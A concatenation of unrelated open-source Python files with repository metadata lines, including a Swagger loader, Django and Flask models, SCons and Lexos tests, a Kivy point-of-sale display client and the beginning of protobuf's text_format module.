self.models = []
self.router = None
self.models = dict()
# parse
# TODO: proper errors
try:
self.schema = flex.load(self.handle)
self.module = module
self.loaded = True
except:
raise SwaggerGenericError('Cannot process schema {} : check resource availability'.format(self.handle))
# make models for definitions
if 'definitions' in self.schema:
# make external models
for name, data in six.iteritems(self.schema['definitions']):
model = None
if 'properties' in data:
model = list() #dict()
for prop, data in six.iteritems(data['properties']):
model.append(prop)
if model:
self.models[name] = model
# make routes
if 'paths' in self.schema and 'basePath' in self.schema:
self.router = SwaggerRouter(self.schema, self.module, self.models)
else:
raise SwaggerValidationError('Schema is missing paths and/or basePath values')
# some advanced parsing techniques to be implemented
def get_schema(self):
if self.loaded:
return self.schema
else:
raise SwaggerGenericError('You should load spec file first')
def get_models(self):
if self.loaded:
return self.models
else:
raise SwaggerGenericError('You should load spec file first')
| ErintLabs/django-openapi-gen | djsw_wrapper/core.py | Python | mit | 1,957 |
# Copyright 2012 Loris Corazza, Sakis Christakidis
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from client import Client as ComboClient
from client import startClient as startComboClient
from client import startDaemonClient as startDaemonComboClient
from client import startBasicNetClient
| schristakidis/p2ner | p2ner/components/engine/comboclient/comboclient/__init__.py | Python | apache-2.0 | 813 |
#!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Test the FindInstalledFiles() and the FindSourceFiles() functions.
"""
import os.path
import TestSCons
python = TestSCons.python
test = TestSCons.TestSCons()
test.write( "f1", "" )
test.write( "f2", "" )
test.write( "f3", "" )
test.write( 'SConstruct', r"""
env = Environment(tools=['default', 'packaging'])
prog = env.Install( 'bin/', ["f1", "f2"] )
env.File( "f3" )
src_files = sorted(map(str, env.FindSourceFiles()))
oth_files = sorted(map(str, env.FindInstalledFiles()))
print src_files
print oth_files
""")
bin_f1 = os.path.join('bin', 'f1')
bin_f2 = os.path.join('bin', 'f2')
bin__f1 = bin_f1.replace('\\', '\\\\')
bin__f2 = bin_f2.replace('\\', '\\\\')
expect_read = """\
['SConstruct', 'f1', 'f2', 'f3']
['%(bin__f1)s', '%(bin__f2)s']
""" % locals()
expect_build = """\
Install file: "f1" as "%(bin_f1)s"
Install file: "f2" as "%(bin_f2)s"
""" % locals()
expected = test.wrap_stdout(read_str = expect_read, build_str = expect_build)
test.run(stdout=expected)
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| azverkan/scons | test/packaging/convenience-functions.py | Python | mit | 2,276 |
# -*- coding: utf-8 -*-
from factory import Sequence, PostGenerationMethodCall
from factory.alchemy import SQLAlchemyModelFactory
from flaskapp.user.models import User
from flaskapp.database import db
class BaseFactory(SQLAlchemyModelFactory):
class Meta:
abstract = True
sqlalchemy_session = db.session
class UserFactory(BaseFactory):
username = Sequence(lambda n: "user{0}".format(n))
email = Sequence(lambda n: "user{0}@example.com".format(n))
password = PostGenerationMethodCall('set_password', 'example')
active = True
class Meta:
model = User
| skipallmighty/flask-app | tests/factories.py | Python | bsd-3-clause | 603 |
import hashlib
import os
from django.db import models
from django.contrib.auth.models import User
def set_questionpapername(instance, filename):
hashout = hashlib.md5()
filenamesplit = os.path.splitext(filename)
input_filename = filenamesplit[0].replace(
' ', '_').replace(',', '_').replace('.', '_')
extension = filenamesplit[1]
hashout.update(input_filename)
if len(input_filename) < 10:
outfilename = input_filename + hashout.hexdigest() + extension
else:
outfilename = input_filename[:10] + '_' + \
hashout.hexdigest() + input_filename[-10:] + extension
return os.path.join('questionpapers', outfilename)
def set_filename(instance, filename):
'''Set a unique file name to the uploaded resource before saving it'''
hashout = hashlib.md5()
filenamesplit = os.path.splitext(filename)
input_filename = filenamesplit[0].replace(
' ', '_').replace(',', '_').replace('.', '_')
extension = filenamesplit[1]
hashout.update(input_filename)
if len(input_filename) < 10:
outfilename = input_filename + hashout.hexdigest() + extension
else:
outfilename = input_filename[:10] + '_' + \
hashout.hexdigest() + input_filename[-10:] + extension
return os.path.join('resources', outfilename)
def set_profilepicturename(instance, filename):
filenamesplit = os.path.splitext(filename)
extension = filenamesplit[1]
name = instance.user.username + extension
return os.path.join('profile_pictures', name)
class Department(models.Model):
name = models.CharField(max_length=50)
abbreviation = models.CharField(max_length=10)
def __unicode__(self):
return self.name
class Profile(models.Model):
user = models.OneToOneField(User)
department = models.ForeignKey(Department)
status = models.CharField(max_length=15)
address = models.TextField()
picture = models.ImageField(upload_to=set_profilepicturename, blank=True)
bloodgroup = models.CharField(max_length=5)
phone = models.CharField(max_length=15)
def __unicode__(self):
return "Profile of " + self.user.username
class Subject(models.Model):
code = models.CharField(max_length=10, unique=True)
name = models.CharField(max_length=50)
credit = models.CharField(max_length=5)
course = models.CharField(max_length=10)
semester = models.CharField(max_length=10)
department = models.ForeignKey(Department)
staff = models.ManyToManyField(User, related_name="teachingsubjects")
students = models.ManyToManyField(User, related_name="subscribedsubjects")
description = models.TextField(max_length=5000)
def __unicode__(self):
return self.name
class Resource(models.Model):
title = models.CharField(max_length=100)
category = models.CharField(max_length=50)
subject = models.ForeignKey(Subject)
resourcefile = models.FileField(upload_to=set_filename)
uploader = models.ForeignKey(User)
def __unicode__(self):
return self.title
class Exam(models.Model):
name = models.CharField(max_length=100)
totalmarks = models.CharField(max_length=10)
time = models.CharField(max_length=10)
subject = models.ForeignKey(Subject)
questionpaper = models.FileField(upload_to=set_questionpapername)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __unicode__(self):
return self.name
class Question(models.Model):
text = models.CharField(max_length=5000, unique=True)
module = models.IntegerField()
part = models.CharField(max_length=10)
co = models.CharField(max_length=10)
level = models.CharField(max_length=10)
exam = models.ManyToManyField(Exam)
subject = models.ForeignKey(Subject)
def __unicode__(self):
return self.text
| balasankarc/vijnana | repository/models.py | Python | gpl-3.0 | 3,885 |
"""
Test Cache decorator
@copyright: 2010-2012
@author: Joseph Tallieu <[email protected]>
@organization: Dell Inc. - PG Validation
@license: GNU LGLP v2.1
"""
# This file is part of WSManAPI.
#
# WSManAPI is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2.1 of the License, or
# (at your option) any later version.
#
# WSManAPI is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with WSManAPI. If not, see <http://www.gnu.org/licenses/>.
import cache
@cache.lru_cache(maxsize=10)
def compute(number, second):
print number * 5 + second
if __name__ == "__main__":
compute(2, second=3)
compute(2, second=3)
compute(3, 3)
print compute.cache_info()
| jtallieu/dell-wsman-client-api-python | wsman/test_cache.py | Python | gpl-3.0 | 1,120 |
# coding=utf-8
# Copyright (c) 2015 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import unicode_literals
from storops.unity.resource import UnityResource, UnityResourceList
__author__ = 'Cedric Zhuang'
class UnityStorageResource(UnityResource):
@classmethod
def get(cls, cli, _id=None):
if not isinstance(_id, cls):
ret = cls(_id=_id, cli=cli)
else:
ret = _id
return ret
def action(self, action_name, **kwargs):
return self._cli.action(self.resource_class,
self.get_id(),
action_name,
**kwargs)
def modify_fs(self, **kwargs):
return self.action('modifyFilesystem', **kwargs)
class UnityStorageResourceList(UnityResourceList):
@classmethod
def get_resource_class(cls):
return UnityStorageResource
| emc-openstack/storops | storops/unity/resource/storage_resource.py | Python | apache-2.0 | 1,481 |
# -*- coding: iso-8859-15 -*-
"""
This is BTMS, Bigwood Ticket Management System,
just reserve, sell and print tickets....
"""
# copyright Jakob Laemmle, the GNU GENERAL PUBLIC LICENSE Version 2 license applies
# Kivy's install_twisted_reactor MUST be called early on!
from kivy.support import install_twisted_reactor
install_twisted_reactor()
from kivy.app import App
from kivy.clock import Clock
#from kivy.factory import Factory
#from kivy.properties import ObjectProperty
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.properties import ListProperty
from autobahn.twisted.wamp import ApplicationSession
from autobahn.twisted.wamp import ApplicationRunner
from autobahn.wamp import auth
from twisted.internet.defer import inlineCallbacks, returnValue
#from twisted.internet import defer
#import msgpack
from kivy.storage.jsonstore import JsonStore
store = JsonStore('btms_config.json')
from kivy.uix.button import Button
from kivy.uix.togglebutton import ToggleButton
from kivy.uix.image import Image
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.bubble import Bubble
from kivy.metrics import dp
from kivy.core.audio import SoundLoader
#from plyer import notification
from kivy.uix.textinput import TextInput
from kivy.uix.progressbar import ProgressBar
from functools import partial
import hashlib
import datetime as dt
import json
from kivy.properties import ObjectProperty, ListProperty, BooleanProperty, NumericProperty
from functools import partial
from kivy.uix.widget import Widget
class BtmsPosDispWampComponentAuth(ApplicationSession):
"""
A WAMP application component which is run from the Kivy UI.
"""
def onConnect(self):
print("connected. joining realm {} as user {} ...".format(self.config.realm, btms_user))
self.join(self.config.realm, [u"wampcra"], btms_user)
def onChallenge(self, challenge):
print("authentication challenge received: {}".format(challenge))
if challenge.method == u"wampcra":
if u'salt' in challenge.extra:
key = auth.derive_key(btms_password.text.encode('utf8'),
challenge.extra['salt'].encode('utf8'),
challenge.extra.get('iterations', None),
challenge.extra.get('keylen', None))
else:
key = btms_password.encode('utf8')
signature = auth.compute_wcs(key, challenge.extra['challenge'].encode('utf8'))
return signature.decode('ascii')
else:
raise Exception("don't know how to compute challenge for authmethod {}".format(challenge.method))
def onJoin(self, details):
print("auth session ready", self.config.extra)
global ui
# get the Kivy UI component this session was started from
ui = self.config.extra['ui']
ui.on_session(self)
# subscribe to WAMP PubSub events and call the Kivy UI component's
# function when such an event is received
self.subscribe(ui.on_msg, u'io.crossbar.btms.pos.displays.msg.send')
self.subscribe(ui.onLeaveRemote, u'io.crossbar.btms.onLeaveRemote')
def onLeave(self, details):
print("onLeave: {}".format(details))
if ui.logout_op == 0 or ui.logout_op == None:
ui.ids.sm.current = 'server_connect'
ui.ids.kv_user_log.text = ui.ids.kv_user_log.text + '\n' + ("onLeave: {}".format(details))
elif ui.logout_op == 1:
ui.ids.sm.current = 'login_user'
def onDisconnect(self):
details = ""
print("onDisconnect: {}".format(details))
if ui.logout_op == 0 or ui.logout_op == None:
ui.ids.sm.current = 'server_connect'
ui.ids.kv_user_log.text = ui.ids.kv_user_log.text + '\n' + ("onDisconnect: {}".format(details))
elif ui.logout_op == 1:
ui.ids.sm.current = 'login_user'
class BtmsPosDispRoot(BoxLayout):
"""
The Root widget, defined in conjunction with the rule in btms.kv.
"""
seat_stat_img = ('images/bet_sitz_30px_01.png', 'images/bet_sitz_30px_02.png', 'images/bet_sitz_30px_03.png', 'images/bet_sitz_30px_04.png', 'images/bet_sitz_30px_05.png')
def start_wamp_component_auth(self, server_url, user, password):
global btms_user
global btms_password
btms_user = user
btms_password = hashlib.md5( password ).hexdigest()
self.logout_op = 0
"""
Create a WAMP session and start the WAMP component
"""
self.session = None
# adapt to fit the Crossbar.io instance you're using
url, realm = u"ws://"+server_url+"/ws", u"btmsserverauth"
store.put('settings', server_adress=server_url, ssl='0', user=user)
# Create our WAMP application component
runner = ApplicationRunner(url=url,
realm=realm,
extra=dict(ui=self))
# Start our WAMP application component without starting the reactor because
# that was already started by kivy
runner.run(BtmsPosDispWampComponentAuth, start_reactor=False)
@inlineCallbacks
def on_session(self, session):
"""
Called from WAMP session when attached to Crossbar router.
"""
self.session = session
self.ids.sm.current = 'work1'
self.camera_state = 0
results = yield self.session.call(u'io.crossbar.btms.users.get')
self.get_users(results)
self.ids.kv_user_button.text = btms_user
for row in results:
if row['user'] == btms_user: #TODO simply btms_user to user
self.user_id = row['id']
self.user = btms_user
#Register display on server
if self.ids.kv_pos_display_input.text == '':
self.ids.kv_pos_display_input.text = 'noname'
self.pos_display = self.ids.kv_pos_display_input.text
self.session.call(u'io.crossbar.btms.pos.displays.reg', self.pos_display,'')
#self.session.leave()
def onLeaveRemote(self,details):
ui.ids.kv_user_log.text = ui.ids.kv_user_log.text + '\n' + ("onLeaveRemote: {}".format(details))
print details
self.session.leave()
def get_users(self,results):
user_list1 = []
self.user_list = {}
self.ids.kv_user_list.clear_widgets(children=None)
for row in results:
print row['user']
self.user_list[row['id']] = row['user']
user_list1.append(row['user'])
self.ids.kv_user_list.add_widget(Button(text=str(row['user']), on_release=partial(self.change_user,str(row['user'])),size_hint=[1, None], height=dp(60)))
self.ids.kv_user_list.bind(minimum_height=self.ids.kv_user_list.setter('height'))
store.put('userlist', user_list=user_list1)
def change_user(self,user,*args):
self.ids.kv_password_input.text = ''
self.ids.kv_user_input.text = user
self.ids.sm.current = 'server_connect'
def logout(self,op):
self.logout_op = op
self.ids.kv_password_input.text = ''
self.ids.kv_user_change.disabled = False
self.session.leave()
#self.ids.sm.current = 'login_user'
def on_msg(self,display, msg):
print display, msg
if display == self.pos_display:
self.ids.result_screen_money.text = str(msg['total_price']) + unichr(8364)
self.ids.result_screen_info.text = msg['info']
def set_pos_display(self, *args):
self.session.call(u'io.crossbar.btms.pos.displays.reg', self.ids.kv_pos_display_input.text, self.pos_display)
self.pos_display = self.ids.kv_pos_display_input.text
store.put('displays',display=self.pos_display)
class BtmsPosDispApp(App):
def build(self):
self.title = 'BTMS Pos Display 16.04a'
self.root = BtmsPosDispRoot()
#self.root.ids.kv_user_change.disabled = True
if store.exists('settings'):
self.root.ids.kv_server_adress.text = store.get('settings')['server_adress']
self.root.ids.kv_user_input.text = store.get('settings')['user']
L = store.get('userlist')['user_list']
self.root.ids.kv_user_change.disabled = False
for user in L:
self.root.ids.kv_user_list.add_widget(Button(text=user, on_release=partial(self.root.change_user,user),size_hint=[1, None], height=dp(40)))
self.root.ids.kv_user_list.bind(minimum_height=self.root.ids.kv_user_list.setter('height'))
if store.exists('displays'):
self.root.ids.kv_pos_display_input.text = store.get('displays')['display']
#self.start_wamp_component()
return self.root
#def on_pause(self):
#self.root.stop() #Stop Camera
#return True
#def on_resume(self):
#self.root.stop() #Stop Camera
#TODO Pause and Resume not working if Camera is running
if __name__ == '__main__':
BtmsPosDispApp().run()
| jaques30081983/btms_suite | btms_pos_display/main.py | Python | gpl-2.0 | 9,128 |
import numpy as np
import pandas as pd
from lexos.models.rolling_window_model import RollingWindowsModel, \
RWATestOptions
from lexos.receivers.rolling_window_receiver import RWAFrontEndOptions, \
WindowUnitType, RWATokenType, RWARatioTokenOptions, RWAWindowOptions, \
RWAAverageTokenOptions, RWAPlotOptions
# -------------------------- test by ratio count ------------------------------
# noinspection PyProtectedMember
class TestRatioCountOne:
test_ratio_count = RWATestOptions(
file_id_content_map={0: "ha ha ha ha la ta ha",
1: "la la ta ta da da ha"},
rolling_windows_options=RWAFrontEndOptions(
ratio_token_options=RWARatioTokenOptions(
token_type=RWATokenType.string,
token_frame=pd.DataFrame(
data={
"numerator": ["t"],
"denominator": ["a"]
}
)
),
average_token_options=None,
passage_file_id=0,
window_options=RWAWindowOptions(
window_size=3,
window_unit=WindowUnitType.letter
),
plot_options=RWAPlotOptions(
individual_points=False,
black_white=False
),
milestone="ta",
text_color="#000000"
)
)
# Get the rolling window model and other test components
rw_ratio_model = RollingWindowsModel(test_option=test_ratio_count)
rw_ratio_windows = rw_ratio_model._get_windows()
rw_ratio_graph = rw_ratio_model._generate_rwa_graph()
rw_ratio_csv_frame = rw_ratio_model._get_rwa_csv_frame()
rw_ratio_milestone = \
rw_ratio_model._find_mile_stone_windows_indexes_in_all_windows()
def test_get_windows(self):
np.testing.assert_array_equal(
self.rw_ratio_windows,
['ha ', 'a h', ' ha', 'ha ', 'a h', ' ha', 'ha ', 'a h', ' ha',
'ha ', 'a l', ' la', 'la ', 'a t', ' ta', 'ta ', 'a h', ' ha'])
def test_token_ratio_windows(self):
pd.testing.assert_series_equal(
left=self.rw_ratio_model._find_token_ratio_in_windows(
numerator_token="t",
denominator_token="a",
windows=self.rw_ratio_windows
),
right=pd.Series(
data=[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.5, 0.5, 0.5, 0.0, 0.0],
),
check_names=False)
def test_generate_rwa_graph(self):
assert self.rw_ratio_graph['data'][0]['type'] == 'scattergl'
np.testing.assert_array_equal(
self.rw_ratio_graph['data'][0]['x'],
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17]
)
np.testing.assert_array_equal(
self.rw_ratio_graph['data'][0]['y'],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.5, 0.5, 0.5, 0.0, 0.0]
)
def test_find_milestone(self):
assert self.rw_ratio_milestone == {'t': [15],
'a': [1, 4, 7, 10, 13, 16]}
def test_csv_frame(self):
pd.testing.assert_frame_equal(
self.rw_ratio_csv_frame,
pd.DataFrame(
index=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17],
columns=["t / (t + a)"],
data=[[0.], [0.], [0.], [0.], [0.], [0.], [0.], [0.], [0.],
[0.], [0.], [0.], [0.], [0.5], [0.5], [0.5], [0.], [0.]]
)
)
# -----------------------------------------------------------------------------
# noinspection PyProtectedMember
class TestRatioCountTwo:
test_ratio_count = RWATestOptions(
file_id_content_map={0: "ha ha ha ha la ta ha \n ha ha \n ta ha",
1: "la la ta ta da da ha"},
rolling_windows_options=RWAFrontEndOptions(
ratio_token_options=RWARatioTokenOptions(
token_type=RWATokenType.word,
token_frame=pd.DataFrame(
data={
"numerator": ["ha"],
"denominator": ["la"]
}
)
),
average_token_options=None,
passage_file_id=0,
window_options=RWAWindowOptions(
window_size=2,
window_unit=WindowUnitType.word
),
plot_options=RWAPlotOptions(
individual_points=False,
black_white=False
),
milestone="ta",
text_color="#000000"
)
)
# Get the rolling window model and other testing components.
rw_ratio_model = RollingWindowsModel(test_option=test_ratio_count)
rw_ratio_windows = rw_ratio_model._get_windows()
rw_ratio_graph = rw_ratio_model._generate_rwa_graph()
rw_ratio_milestone = \
rw_ratio_model._find_mile_stone_windows_indexes_in_all_windows()
def test_get_windows(self):
np.testing.assert_array_equal(
self.rw_ratio_windows,
['ha ha ', 'ha ha ', 'ha ha ', 'ha la ', 'la ta ', 'ta ha \n ',
'ha \n ha ', 'ha ha \n ', 'ha \n ta ', 'ta ha'])
def test_generate_rwa_graph(self):
assert self.rw_ratio_graph['data'][0]['type'] == 'scattergl'
np.testing.assert_array_equal(
self.rw_ratio_graph['data'][0]['x'],
[0., 1., 2., 3., 4., 5., 6., 7., 8., 9.]
)
np.testing.assert_array_equal(
self.rw_ratio_graph['data'][0]['y'],
[1., 1., 1., 0.5, 0., 1., 1., 1., 1., 1.]
)
def test_find_milestone(self):
assert self.rw_ratio_milestone == {'t': [5, 9],
'a': []}
# -----------------------------------------------------------------------------
# -------------------------- test by average count ----------------------------
# noinspection PyProtectedMember
class TestAverageCountOne:
test_average_count = RWATestOptions(
file_id_content_map={
0: "ha ha \n ha ha \n la ta \n ha \n ta ta \n la la"},
rolling_windows_options=RWAFrontEndOptions(
ratio_token_options=None,
average_token_options=RWAAverageTokenOptions(
token_type=RWATokenType.string,
tokens=["ta", "ha"]),
passage_file_id=0,
window_options=RWAWindowOptions(
window_size=2,
window_unit=WindowUnitType.line
),
plot_options=RWAPlotOptions(
individual_points=False,
black_white=False
),
milestone=None,
text_color="#000000"
)
)
# Get the rolling window model and other testing components.
rw_average_model = RollingWindowsModel(test_option=test_average_count)
rw_average_windows = rw_average_model._get_windows()
rw_average_graph = rw_average_model._generate_rwa_graph()
rw_average_csv_frame = rw_average_model._get_rwa_csv_frame()
def test_get_windows(self):
np.testing.assert_array_equal(
self.rw_average_windows,
['ha ha \n ha ha \n', ' ha ha \n la ta \n', ' la ta \n ha \n',
' ha \n ta ta \n', ' ta ta \n la la']
)
def test_generate_rwa_graph(self):
assert self.rw_average_graph['data'][0]['type'] == 'scattergl'
np.testing.assert_array_equal(
self.rw_average_graph['data'][0]['x'],
[0., 1., 2., 3., 4.]
)
np.testing.assert_array_equal(
self.rw_average_graph['data'][0]['y'],
[0., 0.5, 0.5, 1., 1.]
)
assert self.rw_average_graph['data'][1]['mode'] == 'lines'
assert self.rw_average_graph['data'][1]['name'] == 'ha'
def test_csv_frame(self):
pd.testing.assert_frame_equal(
self.rw_average_csv_frame,
pd.DataFrame(
index=[0, 1, 2, 3, 4],
columns=["ta", "ha"],
data=[[0., 2.], [0.5, 1.], [0.5, 0.5], [1., 0.5], [1., 0.]]
)
)
# noinspection PyProtectedMember
class TestAverageCountTwo:
test_average_count = RWATestOptions(
file_id_content_map={
0: "ha ha \n ha ha \n la ta \n ha \n ta ta \n la la"},
rolling_windows_options=RWAFrontEndOptions(
ratio_token_options=None,
average_token_options=RWAAverageTokenOptions(
token_type=RWATokenType.word,
tokens=["ta", "ha"]),
passage_file_id=0,
window_options=RWAWindowOptions(
window_size=2,
window_unit=WindowUnitType.word
),
plot_options=RWAPlotOptions(
individual_points=False,
black_white=False
),
milestone=None,
text_color="#000000"
)
)
# Get the rolling window model and other testing components.
rw_average_model = RollingWindowsModel(test_option=test_average_count)
rw_average_windows = rw_average_model._get_windows()
rw_average_graph = rw_average_model._generate_rwa_graph()
rw_average_csv_frame = rw_average_model._get_rwa_csv_frame()
def test_get_windows(self):
np.testing.assert_array_equal(
self.rw_average_windows,
['ha ha \n ', 'ha \n ha ', 'ha ha \n ', 'ha \n la ', 'la ta \n ',
'ta \n ha \n ', 'ha \n ta ', 'ta ta \n ', 'ta \n la ', 'la la']
)
def test_generate_rwa_graph(self):
assert self.rw_average_graph['data'][0]['type'] == 'scattergl'
np.testing.assert_array_equal(
self.rw_average_graph['data'][0]['x'],
[0., 1., 2., 3., 4., 5., 6., 7., 8., 9.]
)
np.testing.assert_array_equal(
self.rw_average_graph['data'][0]['y'],
[0., 0., 0., 0., 0.5, 0.5, 0.5, 1., 0.5, 0.]
)
assert self.rw_average_graph['data'][1]['mode'] == 'lines'
assert self.rw_average_graph['data'][1]['name'] == 'ha'
def test_csv_frame(self):
pd.testing.assert_frame_equal(
self.rw_average_csv_frame,
pd.DataFrame(
index=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
columns=["ta", "ha"],
data=[[0.0, 1.0], [0.0, 1.0], [0.0, 1.0], [0.0, 0.5],
[0.5, 0.0], [0.5, 0.5], [0.5, 0.5], [1.0, 0.0],
[0.5, 0.0], [0.0, 0.0]]
)
)
# -----------------------------------------------------------------------------
# -------------------------- test static method -------------------------------
# noinspection PyProtectedMember
rw_test_letters = RollingWindowsModel._get_letters_windows(
passage="hello good", windows_size=2)
# noinspection PyProtectedMember
rw_test_words = RollingWindowsModel._get_word_windows(
passage="hello goodbye dog", window_size=1)
# noinspection PyProtectedMember
rw_test_lines = RollingWindowsModel._get_line_windows(
passage="hello goodbye dog hi \n this is a test \n this is another test",
window_size=1)
# noinspection PyProtectedMember
rw_test_find_regex = RollingWindowsModel._find_regex_in_window(
window="hello this the test", regex="^h")
# noinspection PyProtectedMember
rw_test_find_word = RollingWindowsModel._find_word_in_window(
window="hello this the test", word="the")
# noinspection PyProtectedMember
rw_test_find_string = RollingWindowsModel._find_string_in_window(
window="hello this the test the test", string="the test")
class TestStaticMethods:
def test_get_letters_window(self):
np.testing.assert_array_equal(
rw_test_letters[0:9],
['he', 'el', 'll', 'lo', 'o ', ' g', 'go', 'oo', 'od']
)
def test_get_words_window(self):
np.testing.assert_array_equal(rw_test_words[0:3],
['hello ', 'goodbye ', 'dog'])
def test_get_lines_window(self):
np.testing.assert_array_equal(rw_test_lines[0:3],
["hello goodbye dog hi \n",
" this is a test \n",
" this is another test"])
def test_find_regex(self):
assert rw_test_find_regex == 1
def test_find_word(self):
assert rw_test_find_word == 1
def test_find_string(self):
assert rw_test_find_string == 2
| WheatonCS/Lexos | test/unit_test/test_rolling_windows_model.py | Python | mit | 12,643 |
# Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains routines for printing protocol messages in text format.
Simple usage example:
# Create a proto object and serialize it to a text proto string.
message = my_proto_pb2.MyMessage(foo='bar')
text_proto = text_format.MessageToString(message)
# Parse a text proto string.
message = text_format.Parse(text_proto, my_proto_pb2.MyMessage())
"""
__author__ = '[email protected] (Kenton Varda)'
import io
import re
import six
if six.PY3:
long = int # pylint: disable=redefined-builtin,invalid-name
# pylint: disable=g-import-not-at-top
from google.protobuf.internal import type_checkers
from google.protobuf import descriptor
from google.protobuf import text_encoding
__all__ = ['MessageToString', 'PrintMessage', 'PrintField', 'PrintFieldValue',
'Merge']
_INTEGER_CHECKERS = (type_checkers.Uint32ValueChecker(),
type_checkers.Int32ValueChecker(),
type_checkers.Uint64ValueChecker(),
type_checkers.Int64ValueChecker())
_FLOAT_INFINITY = re.compile('-?inf(?:inity)?f?', re.IGNORECASE)
_FLOAT_NAN = re.compile('nanf?', re.IGNORECASE)
_FLOAT_TYPES = frozenset([descriptor.FieldDescriptor.CPPTYPE_FLOAT,
descriptor.FieldDescriptor.CPPTYPE_DOUBLE])
_QUOTES = frozenset(("'", '"'))
_ANY_FULL_TYPE_NAME = 'google.protobuf.Any'
class Error(Exception):
"""Top-level module error for text_format."""
class ParseError(Error):
"""Thrown in case of text parsing or tokenizing error."""
def __init__(self, message=None, line=None, column=None):
if message is not None and line is not None:
loc = str(line)
if column is not None:
loc += ':{0}'.format(column)
message = '{0} : {1}'.format(loc, message)
if message is not None:
super(ParseError, self).__init__(message)
else:
super(ParseError, self).__init__()
self._line = line
self._column = column
def GetLine(self):
return self._line
def GetColumn(self):
return self._column
class TextWriter(object):
def __init__(self, as_utf8):
if six.PY2:
self._writer = io.BytesIO()
else:
self._writer = io.StringIO()
def write(self, val):
if six.PY2:
if isinstance(val, six.text_type):
val = val.encode('utf-8')
return self._writer.write(val)
def close(self):
return self._writer.close()
def getvalue(self):
return self._writer.getvalue()
def MessageToString(message,
as_utf8=False,
as_one_line=False,
pointy_brackets=False,
use_index_order=False,
float_format=None,
use_field_number=False,
descriptor_pool=None,
indent=0,
message_formatter=None):
"""Convert protobuf message to text format.
Floating point values can be formatted compactly with 15 digits of
precision (which is the most that IEEE 754 "double" can guarantee)
